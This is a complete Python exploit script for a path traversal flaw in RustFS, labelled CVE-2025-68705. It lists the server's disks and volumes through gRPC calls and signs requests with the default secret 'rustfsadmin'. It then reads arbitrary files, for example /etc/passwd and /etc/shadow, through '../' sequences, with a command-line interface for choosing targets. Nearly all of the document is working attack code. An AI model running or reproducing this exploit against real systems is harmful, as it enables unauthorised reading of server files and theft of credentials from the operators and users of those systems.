#!/usr/bin/env python3
"""
CVE-2025-68705 RustFS Path Traversal Exploit

This script exploits a path traversal vulnerability in RustFS that allows
reading arbitrary files on the server.

Author: Security Researcher
CVE: CVE-2025-68705

Usage:
    python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Required Arguments:
    -H, --host        Target host IP or hostname
    -p, --port        Target port number
    -f, --file        File path to read (optional with --check-only)

Optional Arguments:
    -s, --secret      Secret key for signature (default: rustfsadmin)
    -o, --offset      File read offset (default: 0)
    -l, --length      Number of bytes to read (default: 4096)
    --check-only      Only check if target is vulnerable

Examples:
    python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
    python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -s customsecret -o 0 -l 1024
    python exp.py -H 192.168.1.128 -p 9000 --check-only
"""

import argparse
import base64
import hashlib
import hmac
import re
import socket
import sys
import time
from typing import List, Dict, Optional, Tuple

import requests
from h2.connection import H2Connection
from h2.config import H2Configuration
from h2.events import DataReceived, StreamEnded, TrailersReceived


class RustFSExploit:
    """Exploit class for CVE-2025-68705"""

    def __init__(self, host: str, port: int, secret: str):
        """
        Initialize the exploit.

        Args:
            host: Target host IP or hostname
            port: Target port number
            secret: Secret key for signature generation
        """
        self.host = host
        self.port = port
        self.secret = secret

    def grpc_call(self, method_path: str, request_body: bytes = b'\x00\x00\x00\x00\x00') -> Tuple[bytes, Optional[str]]:
        """
        Make a gRPC call to the target server.

        Args:
            method_path: gRPC method path
            request_body: Request body (protobuf encoded)

        Returns:
            Tuple of (response_body, grpc_status)
        """
        try:
            sock = socket.create_connection((self.host, self.port), timeout=10)
            sock.settimeout(5)

            conn = H2Connection(H2Configuration(client_side=True))
            conn.initiate_connection()
            sock.sendall(conn.data_to_send())

            sid = conn.get_next_available_stream_id()

            headers = [
                (':method', 'POST'),
                (':scheme', 'http'),
                (':authority', f'{self.host}:{self.port}'),
                (':path', method_path),
                ('content-type', 'application/grpc'),
                ('authorization', 'rustfs rpc'),
                ('te', 'trailers')
            ]

            conn.send_headers(sid, headers, end_stream=False)
            conn.send_data(sid, request_body, end_stream=True)
            sock.sendall(conn.data_to_send())

            body, status = b'', None
            while True:
                data = sock.recv(65535)
                if not data:
                    break
                for event in conn.receive_data(data):
                    if isinstance(event, DataReceived):
                        body += event.data
                        conn.acknowledge_received_data(
                            event.flow_controlled_length, event.stream_id
                        )
                    elif isinstance(event, TrailersReceived):
                        status = dict(event.headers).get(b'grpc-status', b'').decode()
                    elif isinstance(event, StreamEnded):
                        break
                else:
                    sock.sendall(conn.data_to_send())
                    continue
                break

            sock.close()
            return body, status

        except Exception:
            return b'', None

    @staticmethod
    def _encode_varint(value: int) -> bytes:
        """
        Encode an integer as a varint.

        Args:
            value: Integer value to encode

        Returns:
            Varint encoded bytes
        """
        if value < 0:
            value = (1 << 64) + value
        bytes_list = []
        while value > 0x7F:
            bytes_list.append((value & 0x7F) | 0x80)
            value >>= 7
        bytes_list.append(value)
        return bytes(bytes_list)

    @staticmethod
    def _encode_string_field(field_num: int, value: str) -> bytes:
        """
        Encode a string field for protobuf.

        Args:
            field_num: Field number
            value: String value to encode

        Returns:
            Encoded bytes
        """
        encoded_value = value.encode('utf-8')
        tag = (field_num << 3) | 2
        length = RustFSExploit._encode_varint(len(encoded_value))
        return bytes([tag]) + length + encoded_value

    def get_disks(self) -> List[str]:
        """
        Get the list of disks from the server.

        Returns:
            List of disk paths
        """
        disks = []
        try:
            body, status = self.grpc_call('/node_service.NodeService/ServerInfo')

            if status == '0' and body and len(body) > 5:
                data = body[5:]

                # Parse msgpack data (field 2, wire type 2 -> tag 0x12)
                i = 0
                while i < len(data):
                    if i >= len(data):
                        break
                    tag = data[i]
                    i += 1

                    field_num = tag >> 3
                    wire_type = tag & 0x07

                    if field_num == 2 and wire_type == 2:
                        # Read length
                        length = 0
                        shift = 0
                        while i < len(data):
                            byte = data[i]
                            i += 1
                            length |= (byte & 0x7F) << shift
                            if not (byte & 0x80):
                                break
                            shift += 7

                        if i + length <= len(data):
                            msgpack_data = data[i:i + length]

                            try:
                                import msgpack
                                unpacked = msgpack.unpackb(msgpack_data, raw=False)

                                if isinstance(unpacked, list) and len(unpacked) > 7:
                                    # Extract disk list (index 7)
                                    if isinstance(unpacked[7], list):
                                        for disk_info in unpacked[7]:
                                            if isinstance(disk_info, list) and len(disk_info) > 0:
                                                disk_path = disk_info[0]
                                                if isinstance(disk_path, str) and disk_path:
                                                    disks.append(disk_path)
                                    break
                            except Exception:
                                pass
                        break
                    elif wire_type == 0:
                        while i < len(data) and (data[i] & 0x80):
                            i += 1
                        i += 1
                    elif wire_type == 2:
                        length = 0
                        shift = 0
                        while i < len(data):
                            byte = data[i]
                            i += 1
                            length |= (byte & 0x7F) << shift
                            if not (byte & 0x80):
                                break
                            shift += 7
                        i += length

        except Exception:
            pass

        return disks

    def get_volumes(self, disk: str) -> List[str]:
        """
        Get the list of volumes for a specific disk.

        Args:
            disk: Disk path

        Returns:
            List of volume names
        """
        volumes = []
        try:
            # Build ListVolumes request
            request_body = self._encode_string_field(1, disk)

            # Add gRPC message header
            message_length = len(request_body)
            header = bytes([
                0,
                (message_length >> 24) & 0xFF,
                (message_length >> 16) & 0xFF,
                (message_length >> 8) & 0xFF,
                message_length & 0xFF
            ])
            full_request = header + request_body

            body, status = self.grpc_call('/node_service.NodeService/ListVolumes', full_request)

            if status == '0' and body and len(body) > 5:
                data = body[5:]

                # Try to extract volume names
                volume_pattern = rb'"name"\s*:\s*"([^"]+)"'
                matches = re.findall(volume_pattern, data)
                volumes = [m.decode() for m in matches]

                # If not found, try direct string search
                if not volumes:
                    str_pattern = rb'"([a-zA-Z0-9_.-]+)"'
                    all_matches = re.findall(str_pattern, data)
                    volumes = [m.decode() for m in all_matches if m and not m.startswith(b'{"')]

        except Exception:
            pass

        return volumes

    def get_disk_and_volume_info(self) -> Dict:
        """
        Get all disks and volumes information.

        Returns:
            Dictionary containing host and disks with their volumes
        """
        result = {"host": f"{self.host}:{self.port}", "disks": []}

        # Get disk list
        disks = self.get_disks()

        if not disks:
            return result

        # Get volumes for each disk
        for disk in disks:
            volumes = self.get_volumes(disk)
            result["disks"].append({
                "path": disk,
                "volumes": volumes
            })

        return result

    @staticmethod
    def _generate_signature(url: str, method: str, timestamp: str, secret: str) -> str:
        """
        Generate HMAC-SHA256 signature for the request.

        Args:
            url: Request URL path
            method: HTTP method
            timestamp: Unix timestamp
            secret: Secret key

        Returns:
            Base64 encoded signature
        """
        data = f"{url}|{method}|{timestamp}"
        signature = hmac.new(
            secret.encode(),
            data.encode(),
            hashlib.sha256
        ).digest()
        return base64.b64encode(signature).decode()

    def read_file(self, disk: str, volume: str, file_path: str, offset: int = 0, length: int = 4096) -> Optional[str]:
        """
        Exploit path traversal to read arbitrary file.

        Args:
            disk: Disk path
            volume: Volume name
            file_path: Path to the file to read (can use ../ for traversal)
            offset: File read offset
            length: Number of bytes to read

        Returns:
            File content or None if failed
        """
        print(f"[*] Exploiting CVE-2025-68705 against {self.host}:{self.port}")
        print(f"[*] Reading file: {file_path}")

        # Build the URL with path traversal
        url = (f"/rustfs/rpc/read_file_stream?"
               f"disk={disk}&volume={volume}&path={file_path}&offset={offset}&length={length}")
        full_url = f"http://{self.host}:{self.port}{url}"

        # Get current timestamp
        timestamp = str(int(time.time()))

        # Generate signature
        signature = self._generate_signature(url, "GET", timestamp, self.secret)

        # Prepare headers
        headers = {
            "x-rustfs-signature": signature,
            "x-rustfs-timestamp": timestamp
        }

        try:
            response = requests.get(full_url, headers=headers, timeout=10)

            if response.status_code == 200:
                return response.text
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                return None

        except Exception as e:
            print(f"[-] Error during request: {e}")
            return None

    def check_vulnerability(self) -> bool:
        """
        Check if the target is vulnerable by reading /etc/passwd.

        Returns:
            True if vulnerable, False otherwise
        """
        print("[*] Checking for CVE-2025-68705 vulnerability...")

        disk_volume_info = self.get_disk_and_volume_info()

        if not disk_volume_info["disks"]:
            print("[-] No disks found on target")
            return False

        for disk_info in disk_volume_info["disks"]:
            disk = disk_info["path"]
            volumes = disk_info["volumes"]

            if not volumes:
                continue

            volume = volumes[0]

            # Try to read /etc/passwd using path traversal
            result = self.read_file(disk, volume, "../../../../etc/passwd", offset=0, length=700)

            if result and "root:x:0:0" in result:
                print("[+] Target is VULNERABLE!")
                return True

        print("[-] Target does not appear to be vulnerable")
        return False

    def exploit(self, file_path: str, offset: int = 0, length: int = 4096) -> Optional[str]:
        """
        Exploit the path traversal vulnerability to read a file.

        Args:
            file_path: Path to the file to read
            offset: File read offset (default: 0)
            length: Number of bytes to read (default: 4096)

        Returns:
            File content or None if failed
        """
        disk_volume_info = self.get_disk_and_volume_info()

        if not disk_volume_info["disks"]:
            print("[-] No disks found on target")
            return None

        for disk_info in disk_volume_info["disks"]:
            disk = disk_info["path"]
            volumes = disk_info["volumes"]

            if not volumes:
                continue

            volume = volumes[0]

            # Read the file using path traversal
            result = self.read_file(disk, volume, f"../../../../{file_path}", offset, length)

            if result:
                print("[+] Successfully read file!")
                return result

        print("[-] Failed to read file")
        return None


def main():
    """Main entry point for the exploit script."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-68705 RustFS Path Traversal Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -s rustfsadmin
  python exp.py --host 192.168.1.128 --port 9000 --file /etc/shadow --secret rustfsadmin --offset 0 --length 1024
  python exp.py -H 192.168.1.128 -p 9000 --check-only -s rustfsadmin
        """
    )

    parser.add_argument(
        '-H', '--host',
        required=True,
        help='Target host IP or hostname'
    )
    parser.add_argument(
        '-p', '--port',
        type=int,
        required=True,
        help='Target port number'
    )
    parser.add_argument(
        '-f', '--file',
        help='File path to read'
    )
    parser.add_argument(
        '-o', '--offset',
        type=int,
        default=0,
        help='File read offset (default: 0)'
    )
    parser.add_argument(
        '-l', '--length',
        type=int,
        default=4096,
        help='Number of bytes to read (default: 4096)'
    )
    parser.add_argument(
        '-s', '--secret',
        default='rustfsadmin',
        help='Secret key for signature generation (default: rustfsadmin)'
    )
    parser.add_argument(
        '--check-only',
        action='store_true',
        help='Only check if target is vulnerable, do not read file'
    )

    args = parser.parse_args()

    # Initialize exploit
    exploit = RustFSExploit(args.host, args.port, args.secret)

    print(f"[*] Target: {args.host}:{args.port}")
    print(f"[*] Secret: {args.secret}")
    print("-" * 50)

    if args.check_only:
        # Only check vulnerability
        if exploit.check_vulnerability():
            print("[+] Vulnerability confirmed!")
            sys.exit(0)
        else:
            print("[-] Vulnerability not found")
            sys.exit(1)
    else:
        # Check and exploit
        if exploit.check_vulnerability():
            print("-" * 50)
            result = exploit.exploit(args.file, args.offset, args.length)
            if result:
                print(f"\n[+] File content (offset={args.offset}, length={args.length}):")
                print("-" * 50)
                print(result)
                print("-" * 50)
                sys.exit(0)

    sys.exit(1)


if __name__ == "__main__":
    main()
